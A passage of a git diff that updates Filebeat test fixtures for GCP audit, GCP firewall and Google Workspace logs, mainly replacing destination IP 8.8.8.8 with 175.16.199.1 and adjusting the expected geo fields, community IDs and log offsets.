-        "log.offset": 13040,
+        "log.offset": 13049,
         "orchestrator.cluster.name": "analysis-cluster",
         "orchestrator.resource.type": "readyz",
         "orchestrator.type": "kubernetes",
@@ -502,7 +498,7 @@
         "gcp.audit.type": "type.googleapis.com/google.cloud.audit.AuditLog",
         "input.type": "log",
         "log.logger": "projects/elastic-siem/logs/cloudaudit.googleapis.com%2Fdata_access",
-        "log.offset": 14123,
+        "log.offset": 14132,
         "orchestrator.api_version": "v1",
         "orchestrator.cluster.name": "analysis-cluster",
         "orchestrator.type": "kubernetes",
diff --git a/x-pack/filebeat/module/gcp/firewall/test/test.log b/x-pack/filebeat/module/gcp/firewall/test/test.log
index 28218d31fff4..724558ce1df5 100644
--- a/x-pack/filebeat/module/gcp/firewall/test/test.log
+++ b/x-pack/filebeat/module/gcp/firewall/test/test.log
@@ -1,4 +1,4 @@
-{"insertId":"4zuj4nfn4llkb","jsonPayload":{"connection":{"dest_ip":"8.8.8.8","dest_port":53,"protocol":17,"src_ip":"10.128.0.16","src_port":60094},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"continent":"America","country":"usa"},"rule_details":{"action":"DENY","destination_range":["8.8.8.0/24"],"direction":"EGRESS","ip_port_info":[{"ip_protocol":"ALL"}],"priority":1000,"reference":"network:default/firewall:adrian-test-1","target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-12T12:35:24.466374097Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-12T12:35:17.214711274Z"}
+{"insertId":"4zuj4nfn4llkb","jsonPayload":{"connection":{"dest_ip":"175.16.199.1","dest_port":53,"protocol":17,"src_ip":"10.128.0.16","src_port":60094},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"continent":"America","country":"usa"},"rule_details":{"action":"DENY","destination_range":["8.8.8.0/24"],"direction":"EGRESS","ip_port_info":[{"ip_protocol":"ALL"}],"priority":1000,"reference":"network:default/firewall:adrian-test-1","target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-12T12:35:24.466374097Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-12T12:35:17.214711274Z"}
 {"insertId":"1f21ciqfpfssuo","jsonPayload":{"connection":{"dest_ip":"10.42.0.2","dest_port":3389,"protocol":6,"src_ip":"192.0.2.126","src_port":64853},"disposition":"ALLOWED","instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-windows","zone":"us-east1-b"},"remote_location":{"continent":"Asia","country":"omn"},"rule_details":{"action":"ALLOW","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["3389"]}],"priority":1000,"reference":"network:windows-isolated/firewall:windows-isolated-allow-rdp","source_range":["0.0.0.0/0"],"target_tag":["allow-rdp"]},"vpc":{"project_id":"test-beats","subnetwork_name":"windows-isolated","vpc_name":"windows-isolated"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-10-30T13:52:54.473174731Z","resource":{"labels":{"location":"us-east1-b","project_id":"test-beats","subnetwork_id":"3238409883146034900","subnetwork_name":"windows-isolated"},"type":"gce_subnetwork"},"timestamp":"2019-10-30T13:52:42.191988835Z"}
 {"insertId":"8vcfeailjd","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":8080,"protocol":6,"src_ip":"192.0.2.219","src_port":2897},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Krasnodar","continent":"Europe","country":"rus","region":"Krasnodar Krai"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:31:22.738796433Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:31:19.421478847Z"}
 {"insertId":"1bqgmw9feiabij","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"192.0.2.14","src_port":61000},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"continent":"Europe","country":"deu"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:41:35.727004321Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:41:31.079508196Z"}
@@ -10,8 +10,8 @@
 {"insertId":"1y7e4yzff816cq","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"192.0.2.189","src_port":61000},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Violès","continent":"Europe","country":"fra","region":"Provence-Alpes-Côte d'Azur"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T14:06:26.357446279Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T14:06:16.59353182Z"}
 {"insertId":"lx5jlsfggpr0q","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"192.0.2.189","src_port":61000},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Violès","continent":"Europe","country":"fra","region":"Provence-Alpes-Côte d'Azur"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T14:06:28.203068653Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T14:06:22.930570324Z"}
 {"insertId":"18ynfbufer19m1","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":8080,"protocol":6,"src_ip":"192.0.2.200","src_port":42716},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"İzmir","continent":"Asia","country":"tur","region":"İzmir"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T14:32:14.038485761Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T14:32:07.407039908Z"}
-{"insertId":"tzddthfsr6fv5","jsonPayload":{"connection":{"dest_ip":"8.8.8.8","dest_port":80,"protocol":6,"src_ip":"10.28.0.16","src_port":46418},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"continent":"America","country":"usa"},"rule_details":{"action":"DENY","destination_range":["8.8.8.0/24"],"direction":"EGRESS","ip_port_info":[{"ip_protocol":"ALL"}],"priority":1000,"reference":"network:default/firewall:adrian-test-1","target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-12T12:41:28.971534988Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-12T12:41:20.972747063Z"}
-{"insertId":"1k2b7kefsnhzq7","jsonPayload":{"connection":{"dest_ip":"8.8.8.8","dest_port":80,"protocol":17,"src_ip":"10.28.0.16","src_port":58725},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"continent":"America","country":"usa"},"rule_details":{"action":"DENY","destination_range":["8.8.8.0/24"],"direction":"EGRESS","ip_port_info":[{"ip_protocol":"ALL"}],"priority":1000,"reference":"network:default/firewall:adrian-test-1","target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-12T12:42:33.671883883Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-12T12:42:26.50532921Z"}
+{"insertId":"tzddthfsr6fv5","jsonPayload":{"connection":{"dest_ip":"175.16.199.1","dest_port":80,"protocol":6,"src_ip":"10.28.0.16","src_port":46418},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"continent":"America","country":"usa"},"rule_details":{"action":"DENY","destination_range":["8.8.8.0/24"],"direction":"EGRESS","ip_port_info":[{"ip_protocol":"ALL"}],"priority":1000,"reference":"network:default/firewall:adrian-test-1","target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-12T12:41:28.971534988Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-12T12:41:20.972747063Z"}
+{"insertId":"1k2b7kefsnhzq7","jsonPayload":{"connection":{"dest_ip":"175.16.199.1","dest_port":80,"protocol":17,"src_ip":"10.28.0.16","src_port":58725},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"continent":"America","country":"usa"},"rule_details":{"action":"DENY","destination_range":["8.8.8.0/24"],"direction":"EGRESS","ip_port_info":[{"ip_protocol":"ALL"}],"priority":1000,"reference":"network:default/firewall:adrian-test-1","target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-12T12:42:33.671883883Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-12T12:42:26.50532921Z"}
 {"insertId":"1sdfuwxfk8hq1c","jsonPayload":{"connection":{"dest_ip":"10.42.0.10","dest_port":9200,"protocol":6,"src_ip":"192.0.2.114","src_port":44666},"disposition":"ALLOWED","instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-es","zone":"us-east1-b"},"remote_instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-kibana","zone":"us-east1-b"},"remote_location":{"continent":"America","country":"usa"},"remote_vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"},"rule_details":{"action":"ALLOW","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["9200"]}],"priority":1000,"reference":"network:default/firewall:allow9200","source_range":["0.0.0.0/0"],"target_tag":["allow9200"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:54:15.188832255Z","resource":{"labels":{"location":"us-east1-b","project_id":"test-beats","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:54:13.531819246Z"}
 {"insertId":"1sdfuwxfk8hq1b","jsonPayload":{"connection":{"dest_ip":"10.42.0.10","dest_port":9200,"protocol":6,"src_ip":"192.0.2.114","src_port":44668},"disposition":"ALLOWED","instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-es","zone":"us-east1-b"},"remote_instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-kibana","zone":"us-east1-b"},"remote_location":{"continent":"America","country":"usa"},"remote_vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"},"rule_details":{"action":"ALLOW","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["9200"]}],"priority":1000,"reference":"network:default/firewall:allow9200","source_range":["0.0.0.0/0"],"target_tag":["allow9200"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:54:15.188832255Z","resource":{"labels":{"location":"us-east1-b","project_id":"test-beats","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:54:13.551617516Z"}
 {"insertId":"yot1ojetjdiw","jsonPayload":{"connection":{"dest_ip":"10.42.0.2","dest_port":3389,"protocol":6,"src_ip":"192.0.2.7","src_port":1683},"disposition":"ALLOWED","instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-windows","zone":"us-east1-b"},"remote_location":{"city":"Almelo","continent":"Europe","country":"nld","region":"Overijssel"},"rule_details":{"action":"ALLOW","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["3389"]}],"priority":1000,"reference":"network:windows-isolated/firewall:windows-isolated-allow-rdp","source_range":["0.0.0.0/0"],"target_tag":["allow-rdp"]},"vpc":{"project_id":"test-beats","subnetwork_name":"windows-isolated","vpc_name":"windows-isolated"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:54:28.477733837Z","resource":{"labels":{"location":"us-east1-b","project_id":"test-beats","subnetwork_id":"3238409883146034900","subnetwork_name":"windows-isolated"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:54:15.771161946Z"}
diff --git a/x-pack/filebeat/module/gcp/firewall/test/test.log-expected.json b/x-pack/filebeat/module/gcp/firewall/test/test.log-expected.json
index 0242fbd420ef..1ff0d0ad6b06 100644
--- a/x-pack/filebeat/module/gcp/firewall/test/test.log-expected.json
+++ b/x-pack/filebeat/module/gcp/firewall/test/test.log-expected.json
@@ -1,15 +1,16 @@
 [
     {
         "@timestamp": "2019-11-12T12:35:17.214Z",
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
+        "destination.address": "175.16.199.1",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
         "destination.port": 53,
         "event.action": "firewall-rule",
         "event.category": "network",
@@ -45,7 +46,7 @@
         "input.type": "log",
         "log.logger": "projects/test-beats/logs/compute.googleapis.com%2Ffirewall",
         "log.offset": 0,
-        "network.community_id": "1:iiDdIEXnxwSiz/hJbVnseQ4SZVE=",
+        "network.community_id": "1:8MXNnjZEnMbNnkN/Bpg6mN0u+tw=",
         "network.direction": "outbound",
         "network.iana_number": 17,
         "network.name": "default",
@@ -53,7 +54,7 @@
         "network.type": "ipv4",
         "related.ip": [
             "10.128.0.16",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "rule.name": "network:default/firewall:adrian-test-1",
         "service.type": "gcp",
@@ -107,7 +108,7 @@
         ],
         "input.type": "log",
         "log.logger": "projects/test-beats/logs/compute.googleapis.com%2Ffirewall",
-        "log.offset": 983,
+        "log.offset": 988,
         "network.community_id": "1:I+YM7Ru3rl0RVZt/y+F/hkoY0Zc=",
         "network.direction": "inbound",
         "network.iana_number": 6,
@@ -172,7 +173,7 @@
         ],
         "input.type": "log",
         "log.logger": "projects/test-beats/logs/compute.googleapis.com%2Ffirewall",
-        "log.offset": 2025,
+        "log.offset": 2030,
         "network.community_id": "1:I0VuqgaYU1tgaECjlzIRuPzILlg=",
         "network.direction": "inbound",
         "network.iana_number": 6,
@@ -239,7 +240,7 @@
         ],
         "input.type": "log",
         "log.logger": "projects/test-beats/logs/compute.googleapis.com%2Ffirewall",
-        "log.offset": 3074,
+        "log.offset": 3079,
         "network.community_id": "1:JXppP0Oqm+g33JYC0DKoWKxP1GI=",
         "network.direction": "inbound",
         "network.iana_number": 6,
@@ -304,7 +305,7 @@
         ],
         "input.type": "log",
         "log.logger": "projects/test-beats/logs/compute.googleapis.com%2Ffirewall",
-        "log.offset": 4080,
+        "log.offset": 4085,
         "network.community_id": "1:JXppP0Oqm+g33JYC0DKoWKxP1GI=",
         "network.direction": "inbound",
         "network.iana_number": 6,
@@ -369,7 +370,7 @@
         ],
         "input.type": "log",
         "log.logger": "projects/test-beats/logs/compute.googleapis.com%2Ffirewall",
-        "log.offset": 5086,
+        "log.offset": 5091,
         "network.community_id": "1:Us40G9GKff9nidizV7rCFgCQb9E=",
         "network.direction": "inbound",
         "network.iana_number": 6,
@@ -436,7 +437,7 @@
         ],
         "input.type": "log",
         "log.logger": "projects/test-beats/logs/compute.googleapis.com%2Ffirewall",
-        "log.offset": 6141,
+        "log.offset": 6146,
         "network.community_id": "1:CKIvQ4W48ZjqiomnWxipDck9Yb0=",
         "network.direction": "inbound",
         "network.iana_number": 6,
@@ -503,7 +504,7 @@
         ],
         "input.type": "log",
         "log.logger": "projects/test-beats/logs/compute.googleapis.com%2Ffirewall",
-        "log.offset": 7185,
+        "log.offset": 7190,
         "network.community_id": "1:4MspX9JxDXjbalHc/6y9GntbkUc=",
         "network.direction": "inbound",
         "network.iana_number": 6,
@@ -570,7 +571,7 @@
         ],
         "input.type": "log",
         "log.logger": "projects/test-beats/logs/compute.googleapis.com%2Ffirewall",
-        "log.offset": 8228,
+        "log.offset": 8233,
         "network.community_id": "1:KygoHJBT+06I9CnmAPRmvl5CRO4=",
         "network.direction": "inbound",
         "network.iana_number": 6,
@@ -637,7 +638,7 @@
         ],
         "input.type": "log",
         "log.logger": "projects/test-beats/logs/compute.googleapis.com%2Ffirewall",
-        "log.offset": 9279,
+        "log.offset": 9284,
         "network.community_id": "1:20yMRdGVeNrVtL6TKhpfMDy284w=",
         "network.direction": "inbound",
         "network.iana_number": 6,
@@ -704,7 +705,7 @@
         ],
         "input.type": "log",
         "log.logger": "projects/test-beats/logs/compute.googleapis.com%2Ffirewall",
-        "log.offset": 10341,
+        "log.offset": 10346,
         "network.community_id": "1:20yMRdGVeNrVtL6TKhpfMDy284w=",
         "network.direction": "inbound",
         "network.iana_number": 6,
@@ -771,7 +772,7 @@
         ],
         "input.type": "log",
         "log.logger": "projects/test-beats/logs/compute.googleapis.com%2Ffirewall",
-        "log.offset": 11403,
+        "log.offset": 11408,
         "network.community_id": "1:6fenc8+hp2KWF1J9vvGwv3iswV0=",
         "network.direction": "inbound",
         "network.iana_number": 6,
@@ -797,15 +798,16 @@
     },
     {
         "@timestamp": "2019-11-12T12:41:20.972Z",
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
+        "destination.address": "175.16.199.1",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
         "destination.port": 80,
         "event.action": "firewall-rule",
         "event.category": "network",
@@ -840,8 +842,8 @@
         "gcp.source.vpc.vpc_name": "default",
         "input.type": "log",
         "log.logger": "projects/test-beats/logs/compute.googleapis.com%2Ffirewall",
-        "log.offset": 12444,
-        "network.community_id": "1:L+yxRTY3bxAv2hbljIrAstKlE+g=",
+        "log.offset": 12449,
+        "network.community_id": "1:hj1SFezPO/0oF174YfrjXhZGr4U=",
         "network.direction": "outbound",
         "network.iana_number": 6,
         "network.name": "default",
@@ -849,7 +851,7 @@
         "network.type": "ipv4",
         "related.ip": [
             "10.28.0.16",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "rule.name": "network:default/firewall:adrian-test-1",
         "service.type": "gcp",
@@ -863,15 +865,16 @@
     },
     {
         "@timestamp": "2019-11-12T12:42:26.505Z",
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
+        "destination.address": "175.16.199.1",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
         "destination.port": 80,
         "event.action": "firewall-rule",
         "event.category": "network",
@@ -906,8 +909,8 @@
         "gcp.source.vpc.vpc_name": "default",
         "input.type": "log",
         "log.logger": "projects/test-beats/logs/compute.googleapis.com%2Ffirewall",
-        "log.offset": 13425,
-        "network.community_id": "1:c7bqGkBTPmOmWydHv/uxpk1qOjc=",
+        "log.offset": 13435,
+        "network.community_id": "1:CtPZG1inscOsdz/61j5WLHMljVI=",
         "network.direction": "outbound",
         "network.iana_number": 17,
         "network.name": "default",
@@ -915,7 +918,7 @@
         "network.type": "ipv4",
         "related.ip": [
             "10.28.0.16",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "rule.name": "network:default/firewall:adrian-test-1",
         "service.type": "gcp",
@@ -975,7 +978,7 @@
         "gcp.source.vpc.vpc_name": "default",
         "input.type": "log",
         "log.logger": "projects/test-beats/logs/compute.googleapis.com%2Ffirewall",
-        "log.offset": 14407,
+        "log.offset": 14422,
         "network.community_id": "1:DAX43chSGct8LhjTchX9JgmQSEE=",
         "network.direction": "internal",
         "network.iana_number": 6,
@@ -1046,7 +1049,7 @@
         "gcp.source.vpc.vpc_name": "default",
         "input.type": "log",
         "log.logger": "projects/test-beats/logs/compute.googleapis.com%2Ffirewall",
-        "log.offset": 15594,
+        "log.offset": 15609,
         "network.community_id": "1:TPU3xS0q892TRpPVImmLO31ok9s=",
         "network.direction": "internal",
         "network.iana_number": 6,
@@ -1111,7 +1114,7 @@
         ],
         "input.type": "log",
         "log.logger": "projects/test-beats/logs/compute.googleapis.com%2Ffirewall",
-        "log.offset": 16781,
+        "log.offset": 16796,
         "network.community_id": "1:nptqbsyCEhZhJ1ZBfy4iEMDFucI=",
         "network.direction": "inbound",
         "network.iana_number": 6,
@@ -1183,7 +1186,7 @@
         "gcp.source.vpc.vpc_name": "default",
         "input.type": "log",
         "log.logger": "projects/test-beats/logs/compute.googleapis.com%2Ffirewall",
-        "log.offset": 17858,
+        "log.offset": 17873,
         "network.community_id": "1:+KvUpcdGASPCZ5QYcOHVgid9Yjg=",
         "network.direction": "internal",
         "network.iana_number": 6,
@@ -1254,7 +1257,7 @@
         "gcp.source.vpc.vpc_name": "default",
         "input.type": "log",
         "log.logger": "projects/test-beats/logs/compute.googleapis.com%2Ffirewall",
-        "log.offset": 19045,
+        "log.offset": 19060,
         "network.community_id": "1:v6u3NIKBcvTUebkWUOly9nrN/HE=",
         "network.direction": "internal",
         "network.iana_number": 6,
@@ -1326,7 +1329,7 @@
         "gcp.source.vpc.vpc_name": "default",
         "input.type": "log",
         "log.logger": "projects/test-beats/logs/compute.googleapis.com%2Ffirewall",
-        "log.offset": 20231,
+        "log.offset": 20246,
         "network.community_id": "1:6Q1oPyCPH/prdYU6FXBpxAgFrP8=",
         "network.direction": "internal",
         "network.iana_number": 6,
diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-application-test.json.log b/x-pack/filebeat/module/google_workspace/admin/test/admin-application-test.json.log
index 2d2d36e96a30..fa9088086f86 100644
--- a/x-pack/filebeat/module/google_workspace/admin/test/admin-application-test.json.log
+++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-application-test.json.log
@@ -1,9 +1,9 @@
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"APPLICATION_SETTINGS","name":"CHANGE_APPLICATION_SETTING","parameters":[{"name":"APPLICATION_EDITION","value":"basic"},{"name":"APPLICATION_NAME","value":"drive"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"APPLICATION_SETTINGS","name":"CREATE_APPLICATION_SETTING","parameters":[{"name":"APPLICATION_EDITION","value":"basic"},{"name":"APPLICATION_NAME","value":"drive"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"APPLICATION_SETTINGS","name":"DELETE_APPLICATION_SETTING","parameters":[{"name":"APPLICATION_EDITION","value":"basic"},{"name":"APPLICATION_NAME","value":"drive"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"APPLICATION_SETTINGS","name":"REORDER_GROUP_BASED_POLICIES_EVENT","parameters":[{"name":"APPLICATION_NAME","value":"drive"},{"name":"GROUP_PRIORITIES","multiValue":["a","b"]},{"name":"SETTING_NAME","value":"setting"}]}}
